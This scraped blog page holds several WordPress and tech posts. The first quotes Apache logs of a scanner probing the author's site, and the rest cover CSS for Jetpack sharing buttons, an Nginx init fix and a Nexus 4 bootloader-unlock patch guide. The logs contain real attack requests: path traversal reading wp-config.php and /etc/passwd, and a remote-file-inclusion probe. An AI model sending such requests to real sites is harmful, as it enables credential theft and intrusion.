WTF?! Is Google trying to hack WordPress sites??

Looking through the Apache access logs of one of my WordPress installations the other day, I notices these entries:

35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:04 +0200] "GET /robots.txt HTTP/1.1" 200 1617 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:04 +0200] "GET /wp-content/plugins/simple-ads-manager/js/slider/tmpl.js HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.zzzzzz.zzz/cache/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/wp-mobile-detector/cache/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:05 +0200] "GET /wp-content/plugins/formcraft/file-upload/server/php/upload.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:07 +0200] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 1617 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/plugins/revslider/temp/update_extract/revslider/db.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php HTTP/1.1" 410 318 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:08 +0200] "GET /wp-content/plugins/recent-backups/download-file.php?file_link=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/./simple-image-manipulator/controller/download.php?filepath=/etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/candidate-application-form/downloadpdffile.php?fileName=../../../../../../../../../../etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:09 +0200] "GET /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:11 +0200] "POST /wp-content/plugins/wp-symposium/server/php/index.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"
35.198.55.156 xxxxxx.xxxxxx.com - [19/Sep/2017:04:30:11 +0200] "GET /wp-content/plugins/wp-symposium/server/php/TWuXPObefpOasQ.php HTTP/1.1" 500 559 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32"

First of all: all these logged requests are coming from IP address 35.198.55.156 which is reported by Whois ARIN as belonging to Google Inc, Mountain View, USA.

Now, notice the first log entry accessing the /robots.txt which seems perfectly fine. Specially since is’s Google, right? But then again, the User-Agent is marked as “Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.75 Safari/537.36 OPR/36.0.2130.32” which is not any of the usual Google crawler User-Agents. Besides, it says “Windows NT 10.0” and “OPR/36.0.2130.32” (Opera 36 browser as reported by whatismybrowser.com) in there.

Triggered by the weird attempts that follow immediately in the few seconds after that first entry, trying access files and locations that do not exist, like /wp-content/plugins/simple-ads-manager/js/slider/tmpl.js, /wp-content/plugins/wp-mobile-detector/resize.php?src=http://www.zzzzzz.zzz/cache/db.php (what? trying to access a very hacky file on on another site through mine?), /wp-content/plugins/wp-symposium/server/php/TWuXPObefpOasQ.php or even /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=../../../../../../../../../etc/passwd (seriously? trying to download the server passwd file?!)… this is very disturbing.

Is Google scanning for vulnerabilities which it would then kindly announce to me when any would be found? I’ve never heard that before… Is this coming from one of their employees who came in with his/her own Window$ (obviously) laptop, unaware of the fact it has a bot running in the background? Seems unlikely to be using that specific Opera user agent… Or are they actually trying to hack my application?

I reported the incident to Google and hope — but don’t expect — to hear more from them soon!

Anybody knows what could be going on here?

XML Sitemap & Google News plugin now fully WPML compatible

Many users have been asking for WPML compatibility but I had never come around to having a serious look into the matter, until one user, Hermes Andreu, kindly shared his patch. It was the final nudge I needed to get serious.

While basic WPML support was introduced in an alpha release in April this year, there remained issues that where difficult to tackle without the help from the WPML staff. They kindly provided me developer access to their latest version and patiently responded to my many questions.WPML compatible

So finally, after many weeks of tests, user feedback and help from WPML staff, I’m happy to announce the release of XML Sitemap & Google News feeds 4.7.3 with full WPML support!

… or at least as far as I’m aware. Please report any issues on Github, the WordPress.org forums or via the contact form.

How to float Jetpack’s social Sharing Buttons

Jetpack’s Sharing module is great. It creates some fine looking social buttons that fit most any website. But there is one downside: they’re only showing at the bottom of a post or page.

Some other social plugins offer floating buttons, said to be far more effective in getting your content shared. And while I don’t know for sure if that is true, it sounds plausible. So let’s try to float Jetpack’s buttons too, shall we?

Where to place the sharing buttons

The best place would be not far from the content, in the left or right margin. But what looks best? And is there place for a vertical floating bar of about 50 pixels wide? It all depends on your theme and the visitors browser window or screen size.

First, let’s start with the basic style rules to float the buttons and make the bar appear presentable.

Since you must be using Jetpack already with the Sharing module activated (no point in following this how-to if you’re not) just go on and activate the Custom CSS module too. Start with adding the following rules to your new Appearance > Edit CSS admin page.

/* basic floating and box style, positioned about half way
 * down the screen to the left of the content */
div.sharedaddy {
    position: fixed;
    top: 38%;
    margin-left: -82px;
    width: 32px;
    background-color: white;
    padding: 25px 15px;
    text-align: center;
}

/* hide some stuff */
div.sharedaddy h3.sd-title,
.sd-social-icon .sd-content ul li a.sd-button.share-more span,
div.sharedaddy li.share-end {
    display: none;
}

/* make the more button fit */
.sd-social-icon .sd-content ul li a.sd-button.share-more {
    margin: 0;
    padding: 4px 7px;
}

/* compact some more */
.sd-content ul {
    margin: 0 !important;
}

Note that the negative margin-left: -82px; makes the whole bar shift to the left. Adjust this to move it far enough to float nicely beside your post content. The background colour should of course be adapted to fit your theme too.

But this is not going to work well when there is no room for the floating social bar. On smaller screens, the box will be pushed out of view and becomes useless. So we’ll have to start doing some calculations and we’ll need to apply these rules only to screens sizes that allow room for the floating bar.

An example

Let’s take for example the TwentyTwelve theme that is used (at the time of writing) on this site.

The maximum width of the content (post plus sidebar) is 960 pixels plus a margin of 40 px on each side, 1040 px in total. The whole thing is centered so if a browser window is wider than 1040 pixels, there is a margin going to show on the left and right. If the browser window is wider than 1040 + 50 + 50 = 1140 pixels then there should be just enough room for a floating bar on the left side, close to the post’s main content. We’ll also need to allow room for the scroll bar on larger posts in this calculation (because many browsers do not take this into account on their own) so we’ll add another 20px for safety.

Now to only apply your style rules to screen sizes wider than 1160 pixels, wrap them in @media rules like this.

@media screen and (min-width: 1160px) {
    ...
}

What about smaller screen sizes?

In case of TwentyTwelve, there is some room between the post content and the right sidebar which can be used. But there are some pitfalls to consider.

For example: when a page uses a full width (no sidebar) template, the floating box might suddenly cover page content. Or some post format or post types have different padding, making the floating box location shift and partly cover the sidebar. Or when the option to show sharing buttons on archive and blog pages is checked, multiple sharing bars will start covering each other.

Generally, you only want the social icons bar to float on individual posts and pages, not on archives. And when there are special templates used, another position might be needed.

So to avoid problems, you will have to adapt and make your style rules more specific. How to do this, again, depends on your theme. You’ll have to study the existing rules in the theme style sheet and any available classes that are appended to the body tag when using a page template or (custom) post type.

Below is a complete working example for TwentyTelve, currently (at the time of writing) being used live on this site. Notice the use of classes like .page-template-default and .single-format-standard to target specific cases.

/* floating social */
@media screen and (min-width: 720px) {
	.page-template-default div.sharedaddy, .single-format-standard div.sharedaddy {
		position: fixed;
		top: 44%;
		left: 65.104166667%;
		width: 32px;
		text-align: center;
	}
	
	.page-template-default div.sharedaddy h3.sd-title, .single-format-standard div.sharedaddy h3.sd-title, .page-template-default .sd-social-icon .sd-content ul li a.sd-button.share-more span, .single-format-standard .sd-social-icon .sd-content ul li a.sd-button.share-more span, div.sharedaddy li.share-end {
		display: none;
	}
	
	.page-template-default .sd-social-icon .sd-content ul li a.sd-button.share-more, .single-format-standard .sd-social-icon .sd-content ul li a.sd-button.share-more {
		margin: 0;
		padding: 4px 7px;
	}
	
	.page-template-default .sd-content ul, .single-format-standard .sd-content ul {
		margin: 0 !important;
	}
}

@media screen and (min-width: 1060px) {
	.page-template-default div.sharedaddy, .single-format-standard div.sharedaddy {
		left: initial;
		margin-left: 637px;
	}
}

@media screen and (min-width: 1150px) {
	.page div.sharedaddy, .single-format-standard div.sharedaddy {
		top: 38%;
		margin-left: -72px;
		padding: 25px 5px 25px 15px;
		background: linear-gradient(to right,#eee,white,white);
		border-radius: 24px 12px 12px 24px;
		box-shadow: rgba(0,0,0,.3) -5px 0 3px;
	}
}

You can see how there are now different @media sections, for different screen sizes. In this case, the vertical floating bar starts at a 720 pixel wide screen, positioned to the right of the content. Then, from 1150px onward, it will show on the left side.

To target only pages using the default template and posts of the normal post format, .page-template-default and .single-format-standard are used. In all other cases, the rules will not apply and the social sharing icons will show below the content as before.

Please note that these classes may not be available in your theme. You’ll have to find out which classes you can use in your case by opening the browser Developer Tools.

I hope this gave some inspiration to start playing around with CSS3 @media rules for your Jetpack social sharing buttons. Have fun!

Graph Paper Press

Graph Paper Press WordPress themes

Graph Paper Press is a small team of web designers and developers based in Brooklyn, NY who build graphically minimal WordPress themes for photographers, artists and entrepreneurs. Their content-rich designs allow you to create a blog, build a portfolio and sell your photography or artwork online in one place! They offer a variety of free WordPress themes and premium WordPress themes that cater specifically to the needs of creatives. Getting started is easy:

  1. Register an account with Graph Paper Press.
  2. Browse and find a theme to download and follow the installation instructions!

Effortless Customization

Graph Paper Press has dozens of WordPress themes and plugins that are both easy to use and customize. Their themes allow you to change fonts, colors, backgrounds, headers, menus, insert logos and create slideshows so that your site is exactly what you want it to be.

E-Commerce Ready

Graph Paper Press also makes a free plugin called Sell Media that allows you to sell photos, prints and other media directly through your WordPress site. Coupled with its many extensions, Sell Media becomes an easy platform through which you can track sales, calculate commissions, protect your work and connect with your customers. It’s a sure-fire way to create and manage a photography business through WordPress. Install Sell Media and voila! You’re running a business!

Final Words…

Sometimes things just don’t work out, and that’s okay. Graph Paper Press offers a 30-day, money-back guarantee on all of their products.

Use this coupon code and save 25%

SAVE25TODAY

Get Started Now

Nginx 1.8.0 “/usr/sbin/service: line 123: exec: reload: not found”

Recently, on one of our older servers, a Debian 6 installation, Nginx was upgraded to 1.8.0 from the dotdeb repos. The update went without any apparent errors, except one — easy to miss — message at the end:

/usr/sbin/service: line 123: exec: reload: not found

In fact, I had missed that and assumed all was fine but after a while the server went down and Nginx would not start again. At least, not after the usual nginx -t && service nginx reload

To my surprise, all other web services like php5-fpm, mysql etc. reloaded just fine with  service ... reload

A reboot did not start nginx either and service nginx start got a similar response:

/usr/sbin/service: line 123: exec: start: not found

Luckily, upon /etc/init.d/nginx start Nginx started correctly so I had my server running again. But I was not closer to finding the cause nor a solution.

Searching the web specifically for nginx 1.8 and debian 6 related issues did not reveal anything of interest. Only one question mentioning the issue in the comments on https://www.dotdeb.org/2015/05/07/nginx-1-8-0/ but it got no response.

I did find a bug report related to an entirely different service which mentioned the same error. And the solution there was to remove that service’s .conf file from /etc/init … so I looked in /etc/init and yes: there was an nginx.conf file there. And yes again: simply deleting it solved the problem!

WordPress 4.2 “Powell”

Version 4.2 of WordPress, named “Powell” in honor of jazz pianist Bud Powell, has been released. All Status301 plugins have been tested and found to work without issues on this new version and tonight the Status301 Network will be upgraded.

Read more about new features and improvements on WordPress.org or just enjoy!

How to fix Nexus 4 unresponsive soft navigation menu buttons

Android 5 soft menu navigation buttons
My Google LG Nexus 4 started showing a very annoying issue after the recent upgrade to Android 5.0 Lollipop. At first, I would just occasionally be unable to use the back, home or open-apps softkeys but within a few days it became increasingly worse up to the point where I would not be able to navigate out of an app at all any more and sometimes could not turn off the alarm clock or even answer an incoming call.

Here is a short video (not mine) that shows the issue well:

Commercial message:

At first, I thought it was because of a recently installed app so I removed the most recent ones and even did a factory reset. No dice. Then, I hoped the 5.0.1 update that came soon after, would fix the issue but it didn’t. Finally I tried reverting to Android 4.4.4 but that made things even worse. So bad that I could not even complete the installation process because of unresponsiveness and random erratic taps.

Is your Google LG Nexus 4 phone starting to show this behavior too? Then you’ll find we’re not alone as there are many threads about the soft menu issue on the Nexus Support Forum and other forums. The accepted answer on the largest thread on this topic is that the issue is a hardware problem and the device should be returned for repair. Also, see the official bug report.

However, getting a replacement part or a new phone is expensive when your device is no longer under warranty. Too expensive for an issue that may pop up out of the blue for no reason, on a phone that may be in “mint condition” only just over one year old, never dropped, scratched or even bumped more than in normal daily use like mine.

So understandably, many have complained and many have sought workarounds.

Someone started a petition for Google / LG to service those outside the one year warranty on http://change.org/en-IN/petitions/google-and-lg-please-accept-quality-issues-in-nexus-series-of-mobile-phones#share. Please take a minute to sign!

Some have reported that the soft menu buttons still work when the device is in landscape position but only when the buttons are on the earphone jack side (see video above!)  while others (as I) completely lost button responsiveness. Some have found that adding some combination of apps that allow customizing the menu position or menu size serves as a good work-around while others report that after a while this will not be enough any more, up to the point where half of the screen becomes a dead zone. I’ve even read a report from someone who installed Ubuntu Touch / for Devices or Firefox OS (I forgot, maybe both) only to find that the “dead zone” issue exists there too.

Luckily, a brilliant young developer named Grigoriy Kraynov has found that even though the issue may be caused by a hardware problem, it is also software related — they are called soft menu buttons after all — and even better: He has created a patch called nexus-4-navfix which he graciously decided to share with the world, just around the time I started to witness the issue on my Nexus 4. Oh, happy happy joy joy! (Not being cynical here, I actually was about to give up on the whole thing.)

So in this how-to, I’ll be showing you the steps I took to apply this marvellous patch to my Nexus4.

PREREQUISITES

1. A Google LG Nexus 4 that is:

a. showing the menu buttons issue as described above. Please note that we’ll need to do some changes in the device settings so if your phone’s state is such that you cannot even do that any more, then I guess you are really out of luck. Still, there might be moments where the issue is less than usual. I’ve seen two days of uninhibited menu use after I re-installed a clean Android 5.0 (I thought I had fixed it!) but that did not last long.

b. running Android 5.0.1 Lollipop or later. On June 23, 2015 the latest patch for Android 5.1.1 was released. It is advised to upgrade to that version of Android if you can, before following this how-to.

2. The phone’s charger and USB connector cable.

3. Computer with Ubuntu 14.10 (or higher) Linux installed. If you are a Windows user, this might be the time to try Ubuntu. It can be installed alongside Windows giving you the option to choose your OS at boot time. Or you can use it to revive that three-year old computer that you considered a write-off after carrying the burden of Windows for three years… My personal flavour is Ubuntu GNOME because I just love the Gnome Shell desktop but Ubuntu ‘regular’ will do fine too.

But if you REALLY do not want to take this opportunity to leave your M$ comfort zone, or if you’re on a Mac, then you should still be able to follow these steps as general pointers. Ignore the Linux specific terminal commands and follow the links I provide for further reading.

CAVEATS & THINGS TO CONSIDER

A. This process or rather the step where you unlock your phone’s boot loader to be able to install ClockworkMod Recovery (if you have not done that before) will wipe your personal data and settings. How to back up your personal stuff is not discussed in this tutorial.

B. Please be aware that the patch must be reverted before installing any new Android upgrade that may arrive in the future. Even though the reversal is not difficult, you must remember to do so when that time comes! I have no idea what happens if you forget. You might want to ask https://github.com/gkraynov … please share his answer in the comments below!

C. Of course, the usual caveats apply: Do this at your own risk! As the steps given here are from personal experience, your case might be different and YMMV — your mileage may vary. In a worst case scenario, this might mean: Render your phone useless other than to serve as pavement material, otherwise known as “bricked.” Do not attempt this on a device that does not suffer the described issue. Author will NOT accept any responsibility either for successful or for failed attempts.

D. I advise to — at least — quickly read through the steps before actually beginning to get a feel of what you need to do and to be able to estimate if you are up for the task. If you feel you will not be able to complete the steps or you do not understand parts of the procedure, please do not dive in head first! Consider searching on the internet some more or asking in the comments below before you begin.

Hope I did not scare you too much 😉

Still here? Then you’re serious and ready to continue reading the steps to apply the patch below. At the end, I’ll give a quick description of reversing the patch which you need to do later on if/when a new Android upgrade notification arrives on your phone.

Commercial message:

THE STEPS

I. Preparations

A. First and foremost: hook your phone to its charger and let it charge to at least 50% but preferably 100%. Also check if your phone charges when hooked with the USB connector cable to your PC. Normally it should charge but if not, please keep an eye on battery level during the process and consider hooking it to the charger during the steps where a PC connection is not needed.

It might sound obvious but it’s no laughing matter if you get a drained battery at just the wrong moment: Your phone will get bricked — read the caveats!

B. Either forget about or create a back-up of your personal stuff like photos, messages etc. If you do not care about what’s on your phone or if you’re already syncing everything of importance with your Google account, then you should be fine. Otherwise, you can find good tutorials on the interwebs about how to create and restore a back-up. I’m not going to discuss that here…

C. Install ADB and Fastboot.

Win/Mac users: you can read all about installing ADB and Fastboot (Windows, OS X and Linux).

On Ubuntu 14.04 it’s pretty simple:
1. Hit Ctrl+t to open a terminal window;
2. Type or copy/paste (note: Ctrl+v does not work in a terminal window but right-click and “Paste” does!)

sudo apt-get install android-tools-adb android-tools-fastboot

and hit Enter. After you’ve entered your password, the tools will be installed.

D. Check build number.
Setings > About phone > Build number
On your Nexus 4, swipe twice from the screen top down and tap the gear icon to open the Settings app. Scroll all the way down and tap About phone. Scroll down again and find the Build number.

Take a note of the number that’s shown there. The number should correspond with one of the “prebuilt” UPDATE.zip packages on https://github.com/gkraynov/nexus-4-navfix/releases or on the more recent forks
https://github.com/mbuc82/nexus-4-navfix/releases by Marcus Buchholz or https://github.com/seliverstov/nexus-4-navfix/releases by Alexander Seliverstov

If it does not correspond with any one of those, then do not continue with this how-to. You will need to use the “git clone” + “./all.sh” method mentioned on https://github.com/gkraynov/nexus-4-navfix

E. Get the patch and roll-back zip files.
On your computer in terminal, enter the following command while replacing __BUILD_NUMBER__ with the number that you noted during step D above. Replace the github username gkraynov with mbuc82 or seliverstov if you found your matching build number on any of those forks.

wget https://github.com/gkraynov/nexus-4-navfix/releases/download/__BUILD_NUMBER__/UPDATE.zip

Hit Enter and a file called UPDATE.zip will be downloaded to your home directory. Now do similar to get the roll-back zip that you need when reverting the patch, before doing the next Android upgrade.

wget https://github.com/gkraynov/nexus-4-navfix/releases/download/__BUILD_NUMBER__/UPDATE_ROLLBACK.zip

Keep this roll-back zip for later use.

F. Get the ClockworkMod Recovery image.
In terminal, do

wget http://download2.clockworkmod.com/recoveries/recovery-clockwork-touch-6.0.4.7-mako.img

This will download the ClockworkMod image for Nexus 4 as listed on http://clockworkmod.com/ to your home directory.

G. Enable USB Debugging mode.
Still on the same About phone page, tap Build number 7 times. You’ll see a message that says Developer Mode has been activated.

Allow USB debuggingNow tap the back/left arrow at the top of the screen to go back up in the Settings menu. You should now have a new item called Developer options above About phone. Tap Developer options and find the option called USB debugging. Tap the check box and then OK after Allow USB debugging? to activate this option.

After USB debugging has been enabled, you’ll need to authorize the computer (that you have installed ADB and Fastboot on in the preparations) to access USB debugging. This will be done in the next step.

II. Install ClockworkMod (CWM) Recovery

Now it’s time really do some stuff.

A. Connect your phone with the USB connector cable.

B. Authorize the connection.
On your computer, open a terminal window with Ctrl+Alt+t or use the one from before if it’s still open and type the command

adb devices

and hit Enter.

Note: if you get the error message

error: insufficient permissions for device

then issue the following two commands

adb kill-server
sudo adb start-server

and then retry.

When this is done for the first time, the response should look like

* daemon not running. starting it now on port 5037 *
* daemon started successfully *
List of devices attached
01b69f85c71cb47e unauthorized

(notice the “unauthorized” after the listed device number)

If there are NO devices listed, you might find the troubleshooting tips on http://blog.dantup.com/2012/10/fixing-adb-device-not-found-with-nexus-7-in-recovery-mode/ helpful to get things going again.

USB debugging connectedWhen successful, you’ll get a notification on your phone asking to grant the connected computer access to USB debugging. Check Always allow from this computer and OK to set up the required key pair. When the connection is up in USB debugging mode, you’ll see a small balloon-like icon with what looks like ears and eyes — is it the Android mascot’s head on a stick? — in the phones notification tray.

In terminal, hit the up arrow (or type the command “adb devices” again) and hit Enter. The response should now look like

List of devices attached
01b69f85c71cb47e device

(notice that “unauthorized” has changed to “device”)

C. Unlock boot loader.

Win/Mac users: Read more on unlocking the boot loader (and re-locking) on http://www.android.gs/how-to-unlock-google-nexus-4-bootloader-re-lock-guide-also-included/

Be aware that unlocking the boot loader will (or at least should) wipe your device, so back up all your user data before doing this if you need to keep anything important. There are reports about the process not wiping on phones bought from Google Play (see http://forum.xda-developers.com/galaxy-nexus/general/discussion-google-play-nexus-wiping-t1650830) but I would not count on that.

In terminal, give the command

adb reboot bootloader

nexus-4-bootloaderAfter a few seconds, the phone will reboot and display the Android mascot lying on its back with belly/hood open.

In the terminal window on your computer, type

fastboot oem unlock

On the phone, you will now be asked if you really want to proceed as the process should wipe all user data. Use the up/down volume buttons to scroll, and the on/off button to accept.

D. Flash ClockworkMod Recovery image.

Win/Mac users: read more on http://www.android.gs/how-to-install-cwm-recovery-on-lg-google-nexus-4/

Back to the Ubuntu terminal window, flash the ClockworkMod image that was downloaded during the Preparations with

fastboot flash recovery recovery-clockwork-touch-6.0.4.7-mako.img

The response should be something like

sending 'recovery' (8838 KB)...
OKAY [ 0.355s]
writing 'recovery'...
OKAY [ 0.495s]
finished. total time: 0.850s

CWM Recovery is now installed on the Nexus 4.

III. Apply the Nexus 4 Navfix patch

Win/Mac users: see http://www.droid-life.com/2013/02/12/guide-how-to-use-adb-sideload-to-update-a-nexus-without-root-or-custom-recovery/ for more.

nexus4 bootloader to recoveryOn the phone, still in boot loader, use the up/down volume buttons to change Start to Recovery mode, then press the on/off button to go into Recovery mode.

CWM logonexus4-clockworkmod-recoveryThe recovery mode should show the ClockworkMod Recovery environment which can be recognized by the grey background and CWM logo in the middle.

Once in ClockworkMod Recovery, use the volume down to select install zip and enter with the on/off button. The choose install zip from sideload and press the on/off button again.

Sideload started...
Now send the package you want to apply
to the device with 'adb sideload [filename]'...

Your phone is now ready and waiting to receive the patch in ADB Sideload mode. Finally, we’re getting to the patching part!

Back to terminal again, do

adb sideload UPDATE.zip

ADB Sideload
Once the file has been sent, the device will be updated.

Terminal should respond with

sending: 'sideload' 100%

Phone should report

Finding update package...
Opening update package...
Installing update...
Updated

After the process has finished successfully, choose +++++Go Back+++++ and then Reboot System Now. ClockworkMod will ask: Root access is missing. Root device? upon which you can respond with No as the device does not need to be rooted.

Your Nexus 4 will now reboot and start fresh with a new install. You can safely select to restore synced account back-up during installation and all your usual apps will get installed again.

Done!

If you are happy with the patch, please consider donating to the developer Grigoriy Kraynov who not only shared his solution and patch but also prebuilt zip packages for our convenience. After all, his work saved you a good sum in either replacement parts or a complete new phone! You can find contact info for a contribution on https://github.com/gkraynov/nexus-4-navfix

Notes:
– This ‘first boot’ will take a long while so please be sure to give the boot process a good five minutes but if you really feel it got stuck and you keep staring at those swarming coloured dots, then simply keep the on/off button pressed until the device shuts down. Then go back to boot loader with On + Volume down. Then move into Recovery mode and choose “Wipe cache partition”.  Then “Reboot system now”.
– Even if the patch may have fixed the issue for you, you have to realize the fix might be temporary. The underlying problem is a hardware issue. The effects of the malfunctioning hardware may increase over time and cause other problems like “ghost tapping” and the screen becoming partially of completely unresponsive. Consider signing http://change.org/en-IN/petitions/google-and-lg-please-accept-quality-issues-in-nexus-series-of-mobile-phones.
– After a successful patch, treat yourself to a nice Lollipop: Go to Settings, About phone and tap multiple times on the Android version number. Tab the lollipop a few times and finally tap and hold it until the game starts. Enjoy!

REVERSAL BEFORE AN ANDROID UPGRADE

Note: roll-back will not delete any data but be prepared to lose your soft menu button control again… First make sure a new pre-built UPDATE.zip package for the Android upgrade becomes available on https://github.com/gkraynov/nexus-4-navfix/releases, https://github.com/mbuc82/nexus-4-navfix/releases or https://github.com/seliverstov/nexus-4-navfix/releases

To reverse the patch before installing any upcoming Android upgrades:
1. re-activate USB debugging mode following step I.F
2. Connect via USB cable.
3. Open a terminal and give the command

adb reboot bootloader

4. Once in boot loader, follow step II.D to flash CWM Recovery again and step III to flash UPDATE_ROLLBACK.zip that you stored in your home directory before. If you lost the rollback package, try downloading it again from https://github.com/gkraynov/nexus-4-navfix/releases, https://github.com/mbuc82/nexus-4-navfix/releases or https://github.com/seliverstov/nexus-4-navfix/releases

Did you do a successful patch? Or did it fail? Anything I missed in this article? Let me know in the comments!